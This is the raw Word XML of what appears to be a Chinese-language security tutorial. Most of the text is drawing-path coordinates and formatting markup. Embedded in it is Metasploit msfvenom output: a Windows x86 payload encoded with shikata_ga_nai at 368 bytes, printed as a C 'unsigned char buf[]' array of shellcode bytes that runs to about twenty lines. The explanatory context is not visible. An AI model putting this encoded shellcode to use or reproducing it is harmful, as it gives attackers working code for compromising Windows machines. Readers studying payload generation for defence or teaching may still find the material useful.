53,3041,8452,3041,8452,3041,8451,3041,8451,3041,8450,3041,8450,3041,8449,3041,8449,3041,8448,3041,8448,3041,8447,3041,8446,3041,8446,3041,8445,3041,8444,3041,8444,3041,8443,3041,8442,3041,8441,3041,8440,3041,8440,3041,8439,3041,8438,3041,8437,3041,8436,3041,8435,3041,8434,3041,8433,3041,8432,3041,8431,3041,8429,3041,8428,3041,8427,3041,8426,3041,8424,3041,8423,3041,8422,3041,8420,3041,8419,3041,8418,3041,8416,3041,8415,3041,8413,3041,8411,3041,8410,3041,8408,3041,8406,3041,8405,3041,8403,3041,8401,3041,8399,3041,8397,3041,8395,3041,8393,3041,8391,3041,8389,3041,8387,3041,8385,3041,8383,3041,8380,3041,8378,3041,8376,3041,8373,3041,8371,3041,8369,3041,8366,3041,8363,3041,8361,3041,8358,3041,8355,3041,8353,3041,8350,3041,8347,3041,8344,3041,8341,3041,8338,3041,8338,3041,8338,3041,8338,3041,8338,3041,8338,3041,8338,3041,8338,3040,8338,3040,8338,3040,8338,3040,8338,3040,8338,3040,8338,3040,8338,3040,8338,3040,8338,3040,8338,3040,8338,3040,8338,3040,8338,3039,8338,3039,8338,3039,8338,3039,8338,3039,8338,3038,8338,3038,8338,3038,8338,3038,8338,3037,8338,3037,8338,3036,8338,3036,8338,3036,8338,3035,8338,3035,8338,3034,8338,3033,8338,3033,8338,3032,8338,3032,8338,3031,8338,3030,8338,3029,8338,3028,8338,3028,8338,3027,8338,3026,8338,3025,8338,3024,8338,3023,8338,3022,8338,3020,8338,3019,8338,3018,8338,3017,8338,3015,8338,3014,8338,3012,8338,3011,8338,3009,8338,3008,8338,3006,8338,3004,8338,3003,8338,3001,8338,2999,8338,2997,8338,2995,8338,2993,8338,2991,8338,2989,8338,2986,8338,2984,8338,2982,8338,2979,8338,2977,8338,2974,8338,2971,8338,2969,8338,2966,8338,2963,8338,2960,8338,2957,8338,2954,8338,2951,8338,2948,8338,2944,8338,2941,8338,2937,8338,2934,8338,2930,8338,2926,8338,2923,8338,2919,8338,2915,8338,2911,8338,2907,8338,2902,8338,2898,8338,2894,8338,2889,8338,2885,8338,2880,8338,2875,8338,2870,8338,2865,8338,2860,8338,2855,8338,2850,8338,2844,8338,2839,8338,2833,8338,2828,8338,2822,8338,2816,8338,2810,8338,2804,8338,2798,8338,2792,8338,2785e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:115.500pt;margin-top:157.500pt;width:6.500pt;height:12.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2310,3150" coordsize="130,250">
        <v:shape style="position:absolute;left:2310;top:3150;width:130;height:250" coordorigin="2310,3150" coordsize="130,250" path="m2335,3161l2335,3161,2335,3161,2335,3161,2335,3161,2335,3161,2335,3161,2335,3161,2335,3161,2335,3161,2335,3161,2335,3161,2335,3161,2335,3161,2335,3161,2335,3161,2335,3161,2335,3161,2336,3161,2336,3161,2336,3161,2336,3161,2336,3161,2336,3161,2336,3161,2336,3161,2336,3161,2336,3161,2337,3161,2337,3161,2337,3161,2337,3161,2337,3161,2338,3161,2338,3161,2338,3161,2338,3161,2338,3161,2339,3161,2339,3161,2339,3161,2340,3161,2340,3161,2340,3161,2341,3161,2341,3161,2342,3161,2342,3161,2343,3161,2343,3161,2344,3161,2344,3161,2345,3161,2345,3161,2346,3161,2346,3161,2347,3161,2348,3161,2348,3161,2349,3161,2350,3161,2351,3161,2351,3161,2352,3161,2353,3161,2354,3161,2355,3161,2356,3161,2357,3161,2358,3161,2359,3161,2360,3161,2361,3161,2362,3161,2363,3161,2364,3161,2365,3161,2366,3161,2368,3161,2369,3161,2370,3161,2372,3161,2373,3161,2374,3161,2376,3161,2377,3161,2379,3161,2380,3161,2382,3161,2384,3161,2385,3161,2387,3161,2389,3161,2391,3161,2392,3161,2394,3161,2396,3161,2398,3161,2400,3161,2402,3161,2404,3161,2406,3161,2409,3161,2411,3161,2413,3161,2415,3161,2418,3161,2420,3161,2422,3161,2425,3161,2427,3161,2430,3161,2433,3161,2435,3161,2438,3161,2441,3161,2444,3161,2446,3161,2449,3161,2452,3161,2455,3161,2455,3161,2455,3161,2455,3161,2455,3161,2455,3161,2455,3161,2455,3161,2455,3161,2455,3161,2455,3161,2455,3161,2455,3161,2455,3161,2455,3161,2455,3161,2455,3161,2455,3161,2455,3161,2455,3161,2455,3162,2455,3162,2455,3162,2455,3162,2455,3162,2455,3163,2455,3163,2455,3163,2455,3164,2455,3164,2455,3164,2455,3165,2455,3165,2455,3166,2455,3166,2455,3167,2455,3167,2455,3168,2455,3168,2455,3169,2455,3170,2455,3170,2455,3171,2455,3172,2455,3173,2455,3173,2455,3174,2455,3175,2455,3176,2455,3177,2455,3178,2455,3180,2455,3181,2455,3182,2455,3183,2455,3184,2455,3186,2455,3187,2455,3189,2455,3190,2455,3192,2455,3193,2455,3195,2455,3197,2455,3198,2455,3200,2455,3202,2455,3204,2455,3206,2455,3208,2455,3210,2455,3213,2455,3215,2455,3217,2455,3219,2455,3222,2455,3224,2455,3227,2455,3230,2455,3232,2455,3235,2455,3238,2455,3241,2455,3244,2455,3247,2455,3250,2455,3254,2455,3257,2455,3260,2455,3264,2455,3267,2455,3271,2455,3275,2455,3278,2455,3282,2455,3286,2455,3290,2455,3295,2455,3299,2455,3303,2455,3307,2455,3312,2455,3317,2455,3321,2455,3326,2455,3331,2455,3336,2455,3341,2455,3346,2455,3351,2455,3357,2455,3362,2455,3368,2455,3373,2455,3379,2455,3385,2455,3391,2455,3397,2455,3403,2455,3409,2455,3416,2455,3416,2455,3416,2455,3416,2455,3416,2455,3416,2455,3416,2455,3416,2455,3416,2455,3416,2455,3416,2455,3416,2455,3416,2455,3416,2455,3416,2455,3416,2455,3416,2455,3416,2455,3416,2455,3416,2455,3416,2455,3416,2455,3416,2454,3416,2454,3416,2454,3416,2454,3416,2454,3416,2454,3416,2454,3416,2453,3416,2453,3416,2453,3416,2453,3416,2453,3416,2452,3416,2452,3416,2452,3416,2452,3416,2451,3416,2451,3416,2451,3416,2450,3416,2450,3416,2450,3416,2449,3416,2449,3416,2448,3416,2448,3416,2447,3416,2447,3416,2446,3416,2446,3416,2445,3416,2445,3416,2444,3416,2443,3416,2443,3416,2442,3416,2441,3416,2441,3416,2440,3416,2439,3416,2438,3416,2437,3416,2437,3416,2436,3416,2435,3416,2434,3416,2433,3416,2432,3416,2431,3416,2430,3416,2429,3416,2428,3416,2426,3416,2425,3416,2424,3416,2423,3416,2421,3416,2420,3416,2419,3416,2417,3416,2416,3416,2414,3416,2413,3416,2411,3416,2410,3416,2408,3416,2407,3416,2405,3416,2403,3416,2402,3416,2400,3416,2398,3416,2396,3416,2394,3416,2392,3416,2390,3416,2388,3416,2386,3416,2384,3416,2382,3416,2380,3416,2377,3416,2375,3416,2373,3416,2370,3416,2368,3416,2365,3416,2363,3416,2360,3416,2358,3416,2355,3416,2352,3416,2350,3416,2347,3416,2344,3416,2341,3416,2338,3416,2335,3416,2335,3416,2335,3416,2335,3416,2335,3416,2335,3416,2335,3416,2335,3416,2335,3416,2335,3416,2335,3416,2335,3416,2335,3416,2335,3415,2335,3415,2335,3415,2335,3415,2335,3415,2335,3415,2335,3415,2335,3415,2335,3415,2335,3414,2335,3414,2335,3414,2335,3414,2335,3413,2335,3413,2335,3413,2335,3412,2335,3412,2335,3412,2335,3411,2335,3411,2335,3410,2335,3410,2335,3409,2335,3409,2335,3408,2335,3407,2335,3407,2335,3406,2335,3405,2335,3405,2335,3404,2335,3403,2335,3402,2335,3401,2335,3400,2335,3399,2335,3398,2335,3397,2335,3396,2335,3394,2335,3393,2335,3392,2335,3391,2335,3389,2335,3388,2335,3386,2335,3385,2335,3383,2335,3381,2335,3380,2335,3378,2335,3376,2335,3374,2335,3372,2335,3370,2335,3368,2335,3366,2335,3364,2335,3362,2335,3359,2335,3357,2335,3354,2335,3352,2335,3349,2335,3347,2335,3344,2335,3341,2335,3338,2335,3335,2335,3332,2335,3329,2335,3326,2335,3323,2335,3319,2335,3316,2335,3313,2335,3309,2335,3305,2335,3302,2335,3298,2335,3294,2335,3290,2335,3286,2335,3282,2335,3278,2335,3273,2335,3269,2335,3264,2335,3260,2335,3255,2335,3250,2335,3245,2335,3240,2335,3235,2335,3230,2335,3225,2335,3220,2335,3214,2335,3209,2335,3203,2335,3197,2335,3191,2335,3185,2335,3179,2335,3173,2335,3167,2335,3161e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:222.500pt;margin-top:211.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="4450,4230" coordsize="130,270">
        <v:shape style="position:absolute;left:4450;top:4230;width:130;height:270" coordorigin="4450,4230" coordsize="130,270" path="m4466,4256l4466,4256,4466,4256,4466,4256,4466,4256,4466,4256,4466,4256,4466,4256,4466,4256,4466,4256,4466,4256,4466,4256,4466,4256,4466,4256,4466,4256,4466,4256,4466,4256,4467,4256,4467,4256,4467,4256,4467,4256,4467,4256,4467,4256,4467,4256,4467,4256,4467,4256,4467,4256,4468,4256,4468,4256,4468,4256,4468,4256,4468,4256,4468,4256,4469,4256,4469,4256,4469,4256,4469,4256,4470,4256,4470,4256,4470,4256,4470,4256,4471,4256,4471,4256,4472,4256,4472,4256,4472,4256,4473,4256,4473,4256,4474,4256,4474,4256,4475,4256,4475,4256,4476,4256,4476,4256,4477,4256,4477,4256,4478,4256,4479,4256,4479,4256,4480,4256,4481,4256,4482,4256,4482,4256,4483,4256,4484,4256,4485,4256,4486,4256,4487,4256,4488,4256,4489,4256,4490,4256,4491,4256,4492,4256,4493,4256,4494,4256,4495,4256,4496,4256,4498,4256,4499,4256,4500,4256,4501,4256,4503,4256,4504,4256,4506,4256,4507,4256,4508,4256,4510,4256,4512,4256,4513,4256,4515,4256,4516,4256,4518,4256,4520,4256,4522,4256,4524,4256,4525,4256,4527,4256,4529,4256,4531,4256,4533,4256,4535,4256,4537,4256,4540,4256,4542,4256,4544,4256,4546,4256,4549,4256,4551,4256,4554,4256,4556,4256,4559,4256,4561,4256,4564,4256,4566,4256,4569,4256,4572,4256,4575,4256,4577,4256,4580,4256,4583,4256,4586,4256,4586,4256,4586,4256,4586,4256,4586,4256,4586,4256,4586,4256,4586,4256,4586,4256,4586,4256,4586,4256,4586,4256,4586,4256,4586,4256,4586,4256,4586,4257,4586,4257,4586,4257,4586,4257,4586,4257,4586,4257,4586,4257,4586,4258,4586,4258,4586,4258,4586,4258,4586,4259,4586,4259,4586,4259,4586,4259,4586,4260,4586,4260,4586,4261,4586,4261,4586,4262,4586,4262,4586,4263,4586,4263,4586,4264,4586,4264,4586,4265,4586,4266,4586,4267,4586,4267,4586,4268,4586,4269,4586,4270,4586,4271,4586,4272,4586,4273,4586,4274,4586,4275,4586,4276,4586,4277,4586,4279,4586,4280,4586,4281,4586,4283,4586,4284,4586,4286,4586,4287,4586,4289,4586,4291,4586,4292,4586,4294,4586,4296,4586,4298,4586,4300,4586,4302,4586,4304,4586,4306,4586,4308,4586,4310,4586,4313,4586,4315,4586,4317,4586,4320,4586,4323,4586,4325,4586,4328,4586,4331,4586,4334,4586,4337,4586,4340,4586,4343,4586,4346,4586,4349,4586,4352,4586,4356,4586,4359,4586,4363,4586,4367,4586,4370,4586,4374,4586,4378,4586,4382,4586,4386,4586,4390,4586,4394,4586,4399,4586,4403,4586,4408,4586,4412,4586,4417,4586,4422,4586,4426,4586,4431,4586,4436,4586,4442,4586,4447,4586,4452,4586,4458,4586,4463,4586,4469,4586,4475,4586,4480,4586,4486,4586,4492,4586,4499,4586,4505,4586,4511,4586,4511,4586,4511,4586,4511,4586,4511,4586,4511,4586,4511,4586,4511,4586,4511,4586,4511,4586,4511,4586,4511,4586,4511,4586,4511,4586,4511,4586,4511,4586,4511,4586,4511,4586,4511,4586,4511,4586,4511,4586,4511,4586,4511,4586,4511,4585,4511,4585,4511,4585,4511,4585,4511,4585,4511,4585,4511,4585,4511,4584,4511,4584,4511,4584,4511,4584,4511,4584,4511,4583,4511,4583,4511,4583,4511,4582,4511,4582,4511,4582,4511,4581,4511,4581,4511,4581,4511,4580,4511,4580,4511,4579,4511,4579,4511,4578,4511,4578,4511,4577,4511,4577,4511,4576,4511,4576,4511,4575,4511,4574,4511,4574,4511,4573,4511,4572,4511,4572,4511,4571,4511,4570,4511,4569,4511,4568,4511,4568,4511,4567,4511,4566,4511,4565,4511,4564,4511,4563,4511,4562,4511,4561,4511,4560,4511,4559,4511,4557,4511,4556,4511,4555,4511,4554,4511,4552,4511,4551,4511,4550,4511,4548,4511,4547,4511,4546,4511,4544,4511,4543,4511,4541,4511,4539,4511,4538,4511,4536,4511,4534,4511,4533,4511,4531,4511,4529,4511,4527,4511,4525,4511,4523,4511,4521,4511,4519,4511,4517,4511,4515,4511,4513,4511,4511,4511,4508,4511,4506,4511,4504,4511,4501,4511,4499,4511,4497,4511,4494,4511,4491,4511,4489,4511,4486,4511,4484,4511,4481,4511,4478,4511,4475,4511,4472,4511,4469,4511,4466,4511,4466,4511,4466,4511,4466,4511,4466,4511,4466,4511,4466,4511,4466,4511,4466,4511,4466,4511,4466,4511,4466,4511,4466,4511,4466,4511,4466,4511,4466,4511,4466,4511,4466,4511,4466,4511,4466,4510,4466,4510,4466,4510,4466,4510,4466,4510,4466,4509,4466,4509,4466,4509,4466,4509,4466,4508,4466,4508,4466,4508,4466,4507,4466,4507,4466,4506,4466,4506,4466,4505,4466,4505,4466,4504,4466,4504,4466,4503,4466,4502,4466,4502,4466,4501,4466,4500,4466,4499,4466,4498,4466,4497,4466,4497,4466,4496,4466,4495,4466,4493,4466,4492,4466,4491,4466,4490,4466,4489,4466,4487,4466,4486,4466,4485,4466,4483,4466,4482,4466,4480,4466,4479,4466,4477,4466,4475,4466,4473,4466,4472,4466,4470,4466,4468,4466,4466,4466,4464,4466,4462,4466,4459,4466,4457,4466,4455,4466,4452,4466,4450,4466,4447,4466,4445,4466,4442,4466,4439,4466,4437,4466,4434,4466,4431,4466,4428,4466,4425,4466,4422,4466,4418,4466,4415,4466,4412,4466,4408,4466,4405,4466,4401,4466,4397,4466,4393,4466,4389,4466,4386,4466,4381,4466,4377,4466,4373,4466,4369,4466,4364,4466,4360,4466,4355,4466,4351,4466,4346,4466,4341,4466,4336,4466,4331,4466,4326,4466,4321,4466,4315,4466,4310,4466,4304,4466,4299,4466,4293,4466,4287,4466,4281,4466,4275,4466,4269,4466,4263,4466,4256e x" fillcolor="#fefefe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86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35" w:lineRule="auto"/>
        <w:ind w:left="1720" w:right="154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2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t> 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‐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0076a9"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>No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platform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was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selected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choosing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Msf::Module::Platform::Windows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from</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="33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the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="34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payload</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="156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3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‐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6"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>No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arch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selected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selecting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arch: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x86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6"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>from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the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payload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4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="6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Found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11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compatible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encoders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5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Attempting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0076a9"/>
          <w:spacing w:val="9"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>to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encode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payload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0076a9"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>with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1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iterations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0076a9"/>
          <w:spacing w:val="9"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>of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x86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shikata_ga_nai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6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x86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shikata_ga_nai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succeeded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6"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>with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size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368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iteration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=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)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7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x86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shikata_ga_nai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chosen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0076a9"/>
          <w:spacing w:val="7"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>with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final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size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368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6"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="6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Payload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size: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368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bytes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9</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18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Final</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="34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size</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="34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of</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="34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c</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="34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file</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="34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1571</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="34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bytes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6"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>10</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="0076a9"/>
          <w:spacing w:val="7"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>unsigned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0076a9"/>
          <w:spacing w:val="9"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>char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buf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[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=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11</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="114"/>
        </w:rPr>
        <w:t> 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"\xd9\xc3\xba\xa1\x43\xe5\x72\xd9\x74\x24\xf4\x5d\x29\xc9\xb1"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12</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="114"/>
        </w:rPr>
        <w:t> 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"\x56\x31\x55\x18\x03\x55\x18\x83\xc5\xa5\xa1\x10\x8e\x4d\xa7"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13</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="114"/>
        </w:rPr>
        <w:t> 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"\xdb\x6f\x8d\xc8\x52\x8a\xbc\xc8\x01\xde\xee\xf8\x42\xb2\x02"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14</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="114"/>
        </w:rPr>
        <w:t> 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"\x72\x06\x27\x91\xf6\x8f\x48\x12\xbc\xe9\x67\xa3\xed\xca\xe6"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15</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="114"/>
        </w:rPr>
        <w:t> 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"\x27\xec\x1e\xc9\x16\x3f\x53\x08\x5f\x22\x9e\x58\x08\x28\x0d"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16</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="114"/>
        </w:rPr>
        <w:t> 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"\x4d\x3d\x64\x8e\xe6\x0d\x68\x96\x1b\xc5\x8b\xb7\x8d\x5e\xd2"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17</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="114"/>
        </w:rPr>
        <w:t> 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"\x17\x2f\xb3\x6e\x1e\x37\xd0\x4b\xe8\xcc\x22\x27\xeb\x04\x7b"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18</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="114"/>
        </w:rPr>
        <w:t> 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"\xc8\x40\x69\xb4\x3b\x98\xad\x72\xa4\xef\xc7\x81\x59\xe8\x13"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19</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="114"/>
        </w:rPr>
        <w:t> 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"\xf8\x85\x7d\x80\x5a\x4d\x25\x6c\x5b\x82\xb0\xe7\x57\x6f\xb6"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20</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="114"/>
        </w:rPr>
        <w:t> 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"\xa0\x7b\x6e\x1b\xdb\x87\xfb\x9a\x0c\x0e\xbf\xb8\x88\x4b\x1b"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21</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="114"/>
        </w:rPr>
        <w:t> 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"\xa0\x89\x31\xca\xdd\xca\x9a\xb3\x7b\x80\x36\xa7\xf1\xcb\x5e"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22</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="114"/>
        </w:rPr>
        <w:t> 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"\x04\x38\xf4\x9e\x02\x4b\x87\xac\x8d\xe7\x0f\x9c\x46\x2e\xd7"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23</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="114"/>
        </w:rPr>
        <w:t> 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"\x95\x41\xd1\x07\x1d\x01\x2f\xa8\x5d\x0b\xf4\xfc\x0d\x23\xdd"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24</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="114"/>
        </w:rPr>
        <w:t> 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"\x7c\xc6\xb3\xe2\xa8\x72\xbe\x74\x93\x2a\xbf\x81\x7b\x28\xc0"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25</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="114"/>
        </w:rPr>
        <w:t> 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"\x89\x4e\xa5\x26\xd9\xe0\xe5\xf6\x9a\x50\x45\xa7\x72\xbb\x4a"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26</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="114"/>
        </w:rPr>
        <w:t> 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"\x98\x63\xc4\x81\xb1\x0e\x2b\x7f\xe9\xa6\xd2\xda\x61\x56\x1a"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27</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="114"/>
        </w:rPr>
        <w:t> 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"\xf1\x0f\x58\x90\xf3\xf0\x17\x51\x76\xe3\x40\x06\x78\xfb\x90"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28</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="114"/>
        </w:rPr>
        <w:t> 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"\xa3\x78\x91\x94\x65\x2f\x0d\x97\x50\x07\x92\x68\xb7\x14\xd5"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29</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="114"/>
        </w:rPr>
        <w:t> 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"\x97\x46\x2c\xad\xae\xdc\x10\xd9\xce\x30\x90\x19\x99\x5a\x90"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30</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="114"/>
        </w:rPr>
        <w:t> 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"\x71\x7d\x3f\xc3\x64\x82\xea\x70\x35\x17\x15\x20\xe9\xb0\x7d"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31</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="114"/>
        </w:rPr>
        <w:t> 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"\xce\xd4\xf7\x21\x31\x33\x84\x26\xcd\xc1\xa3\x8e\xa5\x39\xf4"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32</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="114"/>
        </w:rPr>
